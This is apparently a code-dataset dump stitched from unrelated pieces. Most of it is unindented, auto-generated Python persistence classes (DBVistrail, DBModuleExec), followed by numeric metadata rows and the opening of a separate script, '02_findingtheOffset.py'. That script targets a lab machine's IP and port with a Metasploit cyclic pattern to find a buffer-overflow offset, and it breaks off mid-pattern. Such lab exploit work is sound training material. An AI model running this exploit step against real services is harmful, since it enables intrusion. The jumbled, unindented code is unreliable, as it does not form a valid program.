new_id = id_scope.getNewId(self.vtType)
if self.vtType in id_scope.remap:
id_remap[(id_scope.remap[self.vtType], self.db_id)] = new_id
else:
id_remap[(self.vtType, self.db_id)] = new_id
cp.db_id = new_id
# recreate indices and set flags
cp.db_actions_id_index = dict((v.db_id, v) for v in cp._db_actions)
cp.db_tags_id_index = dict((v.db_id, v) for v in cp._db_tags)
cp.db_tags_name_index = dict((v.db_name, v) for v in cp._db_tags)
cp.db_annotations_id_index = dict((v.db_id, v) for v in cp._db_annotations)
cp.db_annotations_key_index = dict((v.db_key, v) for v in cp._db_annotations)
if not new_ids:
cp.is_dirty = self.is_dirty
cp.is_new = self.is_new
return cp
@staticmethod
def update_version(old_obj, trans_dict, new_obj=None):
if new_obj is None:
new_obj = DBVistrail()
class_dict = {}
if new_obj.__class__.__name__ in trans_dict:
class_dict = trans_dict[new_obj.__class__.__name__]
if 'id' in class_dict:
res = class_dict['id'](old_obj, trans_dict)
new_obj.db_id = res
elif hasattr(old_obj, 'db_id') and old_obj.db_id is not None:
new_obj.db_id = old_obj.db_id
if 'entity_type' in class_dict:
res = class_dict['entity_type'](old_obj, trans_dict)
new_obj.db_entity_type = res
elif hasattr(old_obj, 'db_entity_type') and old_obj.db_entity_type is not None:
new_obj.db_entity_type = old_obj.db_entity_type
if 'version' in class_dict:
res = class_dict['version'](old_obj, trans_dict)
new_obj.db_version = res
elif hasattr(old_obj, 'db_version') and old_obj.db_version is not None:
new_obj.db_version = old_obj.db_version
if 'name' in class_dict:
res = class_dict['name'](old_obj, trans_dict)
new_obj.db_name = res
elif hasattr(old_obj, 'db_name') and old_obj.db_name is not None:
new_obj.db_name = old_obj.db_name
if 'last_modified' in class_dict:
res = class_dict['last_modified'](old_obj, trans_dict)
new_obj.db_last_modified = res
elif hasattr(old_obj, 'db_last_modified') and old_obj.db_last_modified is not None:
new_obj.db_last_modified = old_obj.db_last_modified
if 'actions' in class_dict:
res = class_dict['actions'](old_obj, trans_dict)
for obj in res:
new_obj.db_add_action(obj)
elif hasattr(old_obj, 'db_actions') and old_obj.db_actions is not None:
for obj in old_obj.db_actions:
new_obj.db_add_action(DBAction.update_version(obj, trans_dict))
if hasattr(old_obj, 'db_deleted_actions') and hasattr(new_obj, 'db_deleted_actions'):
for obj in old_obj.db_deleted_actions:
n_obj = DBAction.update_version(obj, trans_dict)
new_obj.db_deleted_actions.append(n_obj)
if 'tags' in class_dict:
res = class_dict['tags'](old_obj, trans_dict)
for obj in res:
new_obj.db_add_tag(obj)
elif hasattr(old_obj, 'db_tags') and old_obj.db_tags is not None:
for obj in old_obj.db_tags:
new_obj.db_add_tag(DBTag.update_version(obj, trans_dict))
if hasattr(old_obj, 'db_deleted_tags') and hasattr(new_obj, 'db_deleted_tags'):
for obj in old_obj.db_deleted_tags:
n_obj = DBTag.update_version(obj, trans_dict)
new_obj.db_deleted_tags.append(n_obj)
if 'annotations' in class_dict:
res = class_dict['annotations'](old_obj, trans_dict)
for obj in res:
new_obj.db_add_annotation(obj)
elif hasattr(old_obj, 'db_annotations') and old_obj.db_annotations is not None:
for obj in old_obj.db_annotations:
new_obj.db_add_annotation(DBAnnotation.update_version(obj, trans_dict))
if hasattr(old_obj, 'db_deleted_annotations') and hasattr(new_obj, 'db_deleted_annotations'):
for obj in old_obj.db_deleted_annotations:
n_obj = DBAnnotation.update_version(obj, trans_dict)
new_obj.db_deleted_annotations.append(n_obj)
new_obj.is_new = old_obj.is_new
new_obj.is_dirty = old_obj.is_dirty
return new_obj
def db_children(self, parent=(None,None), orphan=False):
children = []
to_del = []
for child in self.db_actions:
children.extend(child.db_children((self.vtType, self.db_id), orphan))
if orphan:
to_del.append(child)
for child in to_del:
self.db_delete_action(child)
to_del = []
for child in self.db_tags:
children.extend(child.db_children((self.vtType, self.db_id), orphan))
if orphan:
to_del.append(child)
for child in to_del:
self.db_delete_tag(child)
to_del = []
for child in self.db_annotations:
children.extend(child.db_children((self.vtType, self.db_id), orphan))
if orphan:
to_del.append(child)
for child in to_del:
self.db_delete_annotation(child)
children.append((self, parent[0], parent[1]))
return children
def db_deleted_children(self, remove=False):
children = []
children.extend(self.db_deleted_actions)
children.extend(self.db_deleted_tags)
children.extend(self.db_deleted_annotations)
if remove:
self.db_deleted_actions = []
self.db_deleted_tags = []
self.db_deleted_annotations = []
return children
def has_changes(self):
if self.is_dirty:
return True
for child in self._db_actions:
if child.has_changes():
return True
for child in self._db_tags:
if child.has_changes():
return True
for child in self._db_annotations:
if child.has_changes():
return True
return False
def __get_db_id(self):
return self._db_id
def __set_db_id(self, id):
self._db_id = id
self.is_dirty = True
db_id = property(__get_db_id, __set_db_id)
def db_add_id(self, id):
self._db_id = id
def db_change_id(self, id):
self._db_id = id
def db_delete_id(self, id):
self._db_id = None
def __get_db_entity_type(self):
return self._db_entity_type
def __set_db_entity_type(self, entity_type):
self._db_entity_type = entity_type
self.is_dirty = True
db_entity_type = property(__get_db_entity_type, __set_db_entity_type)
def db_add_entity_type(self, entity_type):
self._db_entity_type = entity_type
def db_change_entity_type(self, entity_type):
self._db_entity_type = entity_type
def db_delete_entity_type(self, entity_type):
self._db_entity_type = None
def __get_db_version(self):
return self._db_version
def __set_db_version(self, version):
self._db_version = version
self.is_dirty = True
db_version = property(__get_db_version, __set_db_version)
def db_add_version(self, version):
self._db_version = version
def db_change_version(self, version):
self._db_version = version
def db_delete_version(self, version):
self._db_version = None
def __get_db_name(self):
return self._db_name
def __set_db_name(self, name):
self._db_name = name
self.is_dirty = True
db_name = property(__get_db_name, __set_db_name)
def db_add_name(self, name):
self._db_name = name
def db_change_name(self, name):
self._db_name = name
def db_delete_name(self, name):
self._db_name = None
def __get_db_last_modified(self):
return self._db_last_modified
def __set_db_last_modified(self, last_modified):
self._db_last_modified = last_modified
self.is_dirty = True
db_last_modified = property(__get_db_last_modified, __set_db_last_modified)
def db_add_last_modified(self, last_modified):
self._db_last_modified = last_modified
def db_change_last_modified(self, last_modified):
self._db_last_modified = last_modified
def db_delete_last_modified(self, last_modified):
self._db_last_modified = None
def __get_db_actions(self):
return self._db_actions
def __set_db_actions(self, actions):
self._db_actions = actions
self.is_dirty = True
db_actions = property(__get_db_actions, __set_db_actions)
def db_get_actions(self):
return self._db_actions
def db_add_action(self, action):
self.is_dirty = True
self._db_actions.append(action)
self.db_actions_id_index[action.db_id] = action
def db_change_action(self, action):
self.is_dirty = True
found = False
for i in xrange(len(self._db_actions)):
if self._db_actions[i].db_id == action.db_id:
self._db_actions[i] = action
found = True
break
if not found:
self._db_actions.append(action)
self.db_actions_id_index[action.db_id] = action
def db_delete_action(self, action):
self.is_dirty = True
for i in xrange(len(self._db_actions)):
if self._db_actions[i].db_id == action.db_id:
if not self._db_actions[i].is_new:
self.db_deleted_actions.append(self._db_actions[i])
del self._db_actions[i]
break
del self.db_actions_id_index[action.db_id]
def db_get_action(self, key):
for i in xrange(len(self._db_actions)):
if self._db_actions[i].db_id == key:
return self._db_actions[i]
return None
def db_get_action_by_id(self, key):
return self.db_actions_id_index[key]
def db_has_action_with_id(self, key):
return key in self.db_actions_id_index
def __get_db_tags(self):
return self._db_tags
def __set_db_tags(self, tags):
self._db_tags = tags
self.is_dirty = True
db_tags = property(__get_db_tags, __set_db_tags)
def db_get_tags(self):
return self._db_tags
def db_add_tag(self, tag):
self.is_dirty = True
self._db_tags.append(tag)
self.db_tags_id_index[tag.db_id] = tag
self.db_tags_name_index[tag.db_name] = tag
def db_change_tag(self, tag):
self.is_dirty = True
found = False
for i in xrange(len(self._db_tags)):
if self._db_tags[i].db_id == tag.db_id:
self._db_tags[i] = tag
found = True
break
if not found:
self._db_tags.append(tag)
self.db_tags_id_index[tag.db_id] = tag
self.db_tags_name_index[tag.db_name] = tag
def db_delete_tag(self, tag):
self.is_dirty = True
for i in xrange(len(self._db_tags)):
if self._db_tags[i].db_id == tag.db_id:
if not self._db_tags[i].is_new:
self.db_deleted_tags.append(self._db_tags[i])
del self._db_tags[i]
break
del self.db_tags_id_index[tag.db_id]
del self.db_tags_name_index[tag.db_name]
def db_get_tag(self, key):
for i in xrange(len(self._db_tags)):
if self._db_tags[i].db_id == key:
return self._db_tags[i]
return None
def db_get_tag_by_id(self, key):
return self.db_tags_id_index[key]
def db_has_tag_with_id(self, key):
return key in self.db_tags_id_index
def db_get_tag_by_name(self, key):
return self.db_tags_name_index[key]
def db_has_tag_with_name(self, key):
return key in self.db_tags_name_index
def __get_db_annotations(self):
return self._db_annotations
def __set_db_annotations(self, annotations):
self._db_annotations = annotations
self.is_dirty = True
db_annotations = property(__get_db_annotations, __set_db_annotations)
def db_get_annotations(self):
return self._db_annotations
def db_add_annotation(self, annotation):
self.is_dirty = True
self._db_annotations.append(annotation)
self.db_annotations_id_index[annotation.db_id] = annotation
self.db_annotations_key_index[annotation.db_key] = annotation
def db_change_annotation(self, annotation):
self.is_dirty = True
found = False
for i in xrange(len(self._db_annotations)):
if self._db_annotations[i].db_id == annotation.db_id:
self._db_annotations[i] = annotation
found = True
break
if not found:
self._db_annotations.append(annotation)
self.db_annotations_id_index[annotation.db_id] = annotation
self.db_annotations_key_index[annotation.db_key] = annotation
def db_delete_annotation(self, annotation):
self.is_dirty = True
for i in xrange(len(self._db_annotations)):
if self._db_annotations[i].db_id == annotation.db_id:
if not self._db_annotations[i].is_new:
self.db_deleted_annotations.append(self._db_annotations[i])
del self._db_annotations[i]
break
del self.db_annotations_id_index[annotation.db_id]
del self.db_annotations_key_index[annotation.db_key]
def db_get_annotation(self, key):
for i in xrange(len(self._db_annotations)):
if self._db_annotations[i].db_id == key:
return self._db_annotations[i]
return None
def db_get_annotation_by_id(self, key):
return self.db_annotations_id_index[key]
def db_has_annotation_with_id(self, key):
return key in self.db_annotations_id_index
def db_get_annotation_by_key(self, key):
return self.db_annotations_key_index[key]
def db_has_annotation_with_key(self, key):
return key in self.db_annotations_key_index
def getPrimaryKey(self):
return self._db_id
class DBModuleExec(object):
vtType = 'module_exec'
def __init__(self, id=None, ts_start=None, ts_end=None, cached=None, module_id=None, module_name=None, completed=None, error=None, abstraction_id=None, abstraction_version=None, machine_id=None, annotations=None, loop_execs=None):
self._db_id = id
self._db_ts_start = ts_start
self._db_ts_end = ts_end
self._db_cached = cached
self._db_module_id = module_id
self._db_module_name = module_name
self._db_completed = completed
self._db_error = error
self._db_abstraction_id = abstraction_id
self._db_abstraction_version = abstraction_version
self._db_machine_id = machine_id
self.db_deleted_annotations = []
self.db_annotations_id_index = {}
if annotations is None:
self._db_annotations = []
else:
self._db_annotations = annotations
for v in self._db_annotations:
self.db_annotations_id_index[v.db_id] = v
self.db_deleted_loop_execs = []
self.db_loop_execs_id_index = {}
if loop_execs is None:
self._db_loop_execs = []
else:
self._db_loop_execs = loop_execs
for v in self._db_loop_execs:
self.db_loop_execs_id_index[v.db_id] = v
self.is_dirty = True
self.is_new = True
def __copy__(self):
return DBModuleExec.do_copy(self)
def do_copy(self, new_ids=False, id_scope=None, id_remap=None):
cp = DBModuleExec(id=self._db_id,
ts_start=self._db_ts_start,
ts_end=self._db_ts_end,
cached=self._db_cached,
module_id=self._db_module_id,
module_name=self._db_module_name,
completed=self._db_completed,
error=self._db_error,
abstraction_id=self._db_abstraction_id,
abstraction_version=self._db_abstraction_version,
machine_id=self._db_machine_id)
if self._db_annotations is None:
cp._db_annotations = []
else:
cp._db_annotations = [v.do_copy(new_ids, id_scope, id_remap) for v in self._db_annotations]
if self._db_loop_execs is None:
cp._db_loop_execs = []
else:
cp._db_loop_execs = [v.do_copy(new_ids, id_scope, id_remap) for v in self._db_loop_execs]
# set new ids
if new_ids:
new_id = id_scope.getNewId(self.vtType)
if self.vtType in id_scope.remap:
id_remap[(id_scope.remap[self.vtType], self.db_id)] = new_id
else:
id_remap[(self.vtType, self.db_id)] = new_id
cp.db_id = new_id
if hasattr(self, 'db_module_id') and ('module', self._db_module_id) in id_remap:
cp._db_module_id = id_remap[('module', self._db_module_id)]
if hasattr(self, 'db_machine_id') and ('machine', self._db_machine_id) in id_remap:
cp._db_machine_id = id_remap[('machine', self._db_machine_id)]
# recreate indices and set flags
cp.db_annotations_id_index = dict((v.db_id, v) for v in cp._db_annotations)
cp.db_loop_execs_id_index = dict((v.db_id, v) for v in cp._db_loop_execs)
if not new_ids:
cp.is_dirty = self.is_dirty
cp.is_new = self.is_new
return cp
@staticmethod
def update_version(old_obj, trans_dict, new_obj=None):
if new_obj is None:
new_obj = DBModuleExec()
class_dict = {}
if new_obj.__class__.__name__ in trans_dict:
class_dict = trans_dict[new_obj.__class__.__name__]
if 'id' in class_dict:
res = class_dict['id'](old_obj, trans_dict)
new_obj.db_id = res
elif hasattr(old_obj, 'db_id') and old_obj.db_id is not None:
new_obj.db_id = old_obj.db_id
if 'ts_start' in class_dict:
res = class_dict['ts_start'](old_obj, trans_dict)
new_obj.db_ts_start = res
elif hasattr(old_obj, 'db_ts_start') and old_obj.db_ts_start is not None:
new_obj.db_ts_start = old_obj.db_ts_start
if 'ts_end' in class_dict:
res = class_dict['ts_end'](old_obj, trans_dict)
new_obj.db_ts_end = res
elif hasattr(old_obj, 'db_ts_end') and old_obj.db_ts_end is not None:
new_obj.db_ts_end = old_obj.db_ts_end
if 'cached' in class_dict:
res = class_dict['cached'](old_obj, trans_dict)
new_obj.db_cached = res
elif hasattr(old_obj, 'db_cached') and old_obj.db_cached is not None:
new_obj.db_cached = old_obj.db_cached
if 'module_id' in class_dict:
res = class_dict['module_id'](old_obj, trans_dict)
new_obj.db_module_id = res
elif hasattr(old_obj, 'db_module_id') and old_obj.db_module_id is not None:
new_obj.db_module_id = old_obj.db_module_id
if 'module_name' in class_dict:
res = class_dict['module_name'](old_obj, trans_dict)
new_obj.db_module_name = res
elif hasattr(old_obj, 'db_module_name') and old_obj.db_module_name is not None:
new_obj.db_module_name = old_obj.db_module_name
if 'completed' in class_dict:
res = class_dict['completed'](old_obj, trans_dict)
new_obj.db_completed = res
elif hasattr(old_obj, 'db_completed') and old_obj.db_completed is not None:
new_obj.db_completed = old_obj.db_completed
if 'error' in class_dict:
res = class_dict['error'](old_obj, trans_dict)
new_obj.db_error = res
elif hasattr(old_obj, 'db_error') and old_obj.db_error is not None:
new_obj.db_error = old_obj.db_error
if 'abstraction_id' in class_dict:
res = class_dict['abstraction_id'](old_obj, trans_dict)
new_obj.db_abstraction_id = res
elif hasattr(old_obj, 'db_abstraction_id') and old_obj.db_abstraction_id is not None:
new_obj.db_abstraction_id = old_obj.db_abstraction_id
if 'abstraction_version' in class_dict:
res = class_dict['abstraction_version'](old_obj, trans_dict)
new_obj.db_abstraction_version = res
elif hasattr(old_obj, 'db_abstraction_version') and old_obj.db_abstraction_version is not None:
new_obj.db_abstraction_version = old_obj.db_abstraction_version
if 'machine_id' in class_dict:
res = class_dict['machine_id'](old_obj, trans_dict)
new_obj.db_machine_id = res
elif hasattr(old_obj, 'db_machine_id') and old_obj.db_machine_id is not None:
new_obj.db_machine_id = old_obj.db_machine_id
if 'annotations' in class_dict:
res = class_dict['annotations'](old_obj, trans_dict)
for obj in res:
new_obj.db_add_annotation(obj)
elif hasattr(old_obj, 'db_annotations') and old_obj.db_annotations is not None:
for obj in old_obj.db_annotations:
new_obj.db_add_annotation(DBAnnotation.update_version(obj, trans_dict))
if hasattr(old_obj, 'db_deleted_annotations') and hasattr(new_obj, 'db_deleted_annotations'):
for obj in old_obj.db_deleted_annotations:
n_obj = DBAnnotation.update_version(obj, trans_dict)
new_obj.db_deleted_annotations.append(n_obj)
if 'loop_execs' in class_dict:
res = class_dict['loop_execs'](old_obj, trans_dict)
for obj in res:
new_obj.db_add_loop_exec(obj)
elif hasattr(old_obj, 'db_loop_execs') and old_obj.db_loop_execs is not None:
for obj in old_obj.db_loop_execs:
new_obj.db_add_loop_exec(DBLoopExec.update_version(obj, trans_dict))
if hasattr(old_obj, 'db_deleted_loop_execs') and hasattr(new_obj, 'db_deleted_loop_execs'):
for obj in old_obj.db_deleted_loop_execs:
n_obj = DBLoopExec.update_version(obj, trans_dict)
new_obj.db_deleted_loop_execs.append(n_obj)
new_obj.is_new = old_obj.is_new
new_obj.is_dirty = old_obj.is_dirty
return new_obj
def db_children(self, parent=(None,None), orphan=False):
children = []
to_del = []
for child in self.db_annotations:
children.extend(child.db_children((self.vtType, self.db_id), orphan))
if orphan:
to_del.append(child)
for child in to_del:
self.db_delete_annotation(child)
to_del = []
for child in self.db_loop_execs:
children.extend(child.db_children((self.vtType, self.db_id), orphan))
if orphan:
to_del.append(child)
for child in to_del:
self.db_delete_loop_exec(child)
children.append((self, parent[0], parent[1]))
return children
def db_deleted_children(self, remove=False):
children = []
children.extend(self.db_deleted_annotations)
children.extend(self.db_deleted_loop_execs)
if remove:
self.db_deleted_annotations = []
self.db_deleted_loop_execs = []
return children
def has_changes(self):
if self.is_dirty:
return True
for child in self._db_annotations:
if child.has_changes():
return True
for child in self._db_loop_execs:
if child.has_changes():
return True
return False
def __get_db_id(self):
return self._db_id
def __set_db_id(self, id):
self._db_id = id
self.is_dirty = True
db_id = property(__get_db_id, __set_db_id)
def db_add_id(self, id):
self._db_id = id
def db_change_id(self, id):
self._db_id = id
def db_delete_id(self, id):
self._db_id = None
def __get_db_ts_start(self):
return self._db_ts_start
def __set_db_ts_start(self, ts_start):
self._db_ts_start = ts_start
self.is_dirty = True
db_ts_start = property(__get_db_ts_start, __set_db_ts_start)
def db_add_ts_start(self, ts_start):
self._db_ts_start = ts_start
def db_change_ts_start(self, ts_start):
self._db_ts_start = ts_start
def db_delete_ts_start(self, ts_start):
self._db_ts_start = None
def __get_db_ts_end(self):
return self._db_ts_end
def __set_db_ts_end(self, ts_end):
self._db_ts_end = ts_end
self.is_dirty = True
db_ts_end = property(__get_db_ts_end, __set_db_ts_end)
def db_add_ts_end(self, ts_end):
self._db_ts_end = ts_end
def db_change_ts_end(self, ts_end):
self._db_ts_end = ts_end
def db_delete_ts_end(self, ts_end):
self._db_ts_end = None
def __get_db_cached(self):
return self._db_cached
def __set_db_cached(self, cached):
self._db_cached = cached
self.is_dirty = True
db_cached = property(__get_db_cached, __set_db_cached)
def db_add_cached(self, cached):
self._db_cached = cached
def db_change_cached(self, cached):
self._db_cached = cached
def db_delete_cached(self, cached):
self._db_cached = None
def __get_db_module_id(self):
return self._db_module_id
def __set_db_module_id(self, module_id):
self._db_module_id = module_id
self.is_dirty = True
db_module_id = property(__get_db_module_id, __set_db_module_id)
def db_add_module_id(self, module_id):
self._db_module_id = module_id
def db_change_module_id(self, module_id):
self._db_module_id = module_id
def db_delete_module_id(self, module_id):
self._db_module_id = None
def __get_db_module_name(self):
return self._db_module_name
def __set_db_module_name(self, module_name):
self._db_module_name = module_name
self.is_dirty = True
db_module_name = property(__get_db_module_name, __set_db_module_name)
def db_add_module_name(self, module_name):
self._db_module_name = module_name
def db_change_module_name(self, module_name):
self._db_module_name = module_name
def db_delete_module_name(self, module_name):
self._db_module_name = None
def __get_db_completed(self):
return self._db_completed
def __set_db_completed(self, completed):
self._db_completed = completed
self.is_dirty = True
db_completed = property(__get_db_completed, __set_db_completed)
def db_add_completed(self, completed):
self._db_completed = completed
def db_change_completed(self, completed):
self._db_completed = completed
def db_delete_completed(self, completed):
self._db_completed = None
def __get_db_error(self):
return self._db_error
def __set_db_error(self, error):
self._db_error = error
self.is_dirty = True
db_error = property(__get_db_error, __set_db_error)
def db_add_error(self, error):
self._db_error = error
def db_change_error(self, error):
self._db_error = error
def db_delete_error(self, error):
self._db_error = None
def __get_db_abstraction_id(self):
return self._db_abstraction_id
def __set_db_abstraction_id(self, abstraction_id):
self._db_abstraction_id = abstraction_id
self.is_dirty = True
db_abstraction_id = property(__get_db_abstraction_id, __set_db_abstraction_id)
def db_add_abstraction_id(self, abstraction_id):
self._db_abstraction_id = abstraction_id
def db_change_abstraction_id(self, abstraction_id):
self._db_abstraction_id = abstraction_id
def db_delete_abstraction_id(self, abstraction_id):
self._db_abstraction_id = None
def __get_db_abstraction_version(self):
return self._db_abstraction_version
def __set_db_abstraction_version(self, abstraction_version):
self._db_abstraction_version = abstraction_version
self.is_dirty = True
db_abstraction_version = property(__get_db_abstraction_version, __set_db_abstraction_version)
def db_add_abstraction_version(self, abstraction_version):
self._db_abstraction_version = abstraction_version
def db_change_abstraction_version(self, abstraction_version):
self._db_abstraction_version = abstraction_version
def db_delete_abstraction_version(self, abstraction_version):
self._db_abstraction_version = None
def __get_db_machine_id(self):
return self._db_machine_id
def __set_db_machine_id(self, machine_id):
self._db_machine_id = machine_id
self.is_dirty = True
db_machine_id = property(__get_db_machine_id, __set_db_machine_id)
def db_add_machine_id(self, machine_id):
self._db_machine_id = machine_id
def db_change_machine_id(self, machine_id):
self._db_machine_id = machine_id
def db_delete_machine_id(self, machine_id):
self._db_machine_id = None
def __get_db_annotations(self):
return self._db_annotations
def __set_db_annotations(self, annotations):
self._db_annotations = annotations
self.is_dirty = True
db_annotations = property(__get_db_annotations, __set_db_annotations)
def db_get_annotations(self):
return self._db_annotations
def db_add_annotation(self, annotation):
self.is_dirty = True
self._db_annotations.append(annotation)
self.db_annotations_id_index[annotation.db_id] = annotation
def db_change_annotation(self, annotation):
self.is_dirty = True
found = False
for i in xrange(len(self._db_annotations)):
if self._db_annotations[i].db_id == annotation.db_id:
self._db_annotations[i] = annotation
found = True
break
if not found:
self._db_annotations.append(annotation)
self.db_annotations_id_index[annotation.db_id] = annotation
def db_delete_annotation(self, annotation):
self.is_dirty = True
for i in xrange(len(self._db_annotations)):
if self._db_annotations[i].db_id == annotation.db_id:
if not self._db_annotations[i].is_new:
self.db_deleted_annotations.append(self._db_annotations[i])
del self._db_annotations[i]
break
del self.db_annotations_id_index[annotation.db_id]
def db_get_annotation(self, key):
for i in xrange(len(self._db_annotations)):
if self._db_annotations[i].db_id == key:
return self._db_annotations[i]
return None
def db_get_annotation_by_id(self, key):
return self.db_annotations_id_index[key]
def db_has_annotation_with_id(self, key):
return key in self.db_annotations_id_index
def __get_db_loop_execs(self):
return self._db_loop_execs
def __set_db_loop_execs(self, loop_execs):
self._db_loop_execs = loop_execs
self.is_dirty = True
db_loop_execs = property(__get_db_loop_execs, __set_db_loop_execs)
def db_get_loop_execs(self):
return self._db_loop_execs
def db_add_loop_exec(self, loop_exec):
self.is_dirty = True
self._db_loop_execs.append(loop_exec)
self.db_loop_execs_id_index[loop_exec.db_id] = loop_exec
def db_change_loop_exec(self, loop_exec):
self.is_dirty = True
found = False
for i in xrange(len(self._db_loop_execs)):
if self._db_loop_execs[i].db_id == loop_exec.db_id:
self._db_loop_execs[i] = loop_exec
found = True
break
if not found:
self._db_loop_execs.append(loop_exec)
self.db_loop_execs_id_index[loop_exec.db_id] = loop_exec
def db_delete_loop_exec(self, loop_exec):
self.is_dirty = True
for i in xrange(len(self._db_loop_execs)):
if self._db_loop_execs[i].db_id == loop_exec.db_id:
if not self._db_loop_execs[i].is_new:
self.db_deleted_loop_execs.append(self._db_loop_execs[i])
del self._db_loop_execs[i]
break
del self.db_loop_execs_id_index[loop_exec.db_id]
def db_get_loop_exec(self, key):
for i in xrange(len(self._db_loop_execs)):
if self._db_loop_execs[i].db_id == key:
return self._db_loop_execs[i]
return None
def db_get_loop_exec_by_id(self, key):
return self.db_loop_execs_id_index[key]
def db_has_loop_exec_with_id(self, key):
return key in self.db_loop_execs_id_index
def getPrimaryKey(self):
return self._db_id
| 41.143774
| 240
| 0.63477
| 45,520
| 320,510
| 4.031503
| 0.00714
| 0.086413
| 0.029295
| 0.026565
| 0.921532
| 0.895321
| 0.857357
| 0.822281
| 0.806129
| 0.778115
| 0
| 0.000348
| 0.282958
| 320,510
| 7,789
| 241
| 41.149056
| 0.798167
| 0.009039
| 0
| 0.817065
| 0
| 0
| 0.023755
| 0.003296
| 0
| 0
| 0
| 0
| 0
| 1
| 0.188872
| false
| 0
| 0.000276
| 0.053155
| 0.313682
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1cf75a88a0bcd70164681cc3e84bf9d71b740ceb
| 48
|
py
|
Python
|
allopy/optimize/portfolio/active/__init__.py
|
wangcj05/allopy
|
0d97127e5132df1449283198143994b45fb11214
|
[
"MIT"
] | 1
|
2021-04-06T04:33:03.000Z
|
2021-04-06T04:33:03.000Z
|
allopy/optimize/portfolio/active/__init__.py
|
wangcj05/allopy
|
0d97127e5132df1449283198143994b45fb11214
|
[
"MIT"
] | null | null | null |
allopy/optimize/portfolio/active/__init__.py
|
wangcj05/allopy
|
0d97127e5132df1449283198143994b45fb11214
|
[
"MIT"
] | null | null | null |
from .optimizer import ActivePortfolioOptimizer
| 24
| 47
| 0.895833
| 4
| 48
| 10.75
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.083333
| 48
| 1
| 48
| 48
| 0.977273
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
1c044ae557848842c8cb04a31d461064ac43b620
| 2,176
|
py
|
Python
|
02_findingtheOffset.py
|
F-Masood/bufferoverflow
|
b287c5033ed79158f183bb8ba7f964efeccbfe59
|
[
"MIT"
] | null | null | null |
02_findingtheOffset.py
|
F-Masood/bufferoverflow
|
b287c5033ed79158f183bb8ba7f964efeccbfe59
|
[
"MIT"
] | null | null | null |
02_findingtheOffset.py
|
F-Masood/bufferoverflow
|
b287c5033ed79158f183bb8ba7f964efeccbfe59
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python
import sys,socket
#msf-pattern_create -l 1850 [vulnhub netstart by foxlox]
ip = '192.168.10.51'
port = 2371
offset = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0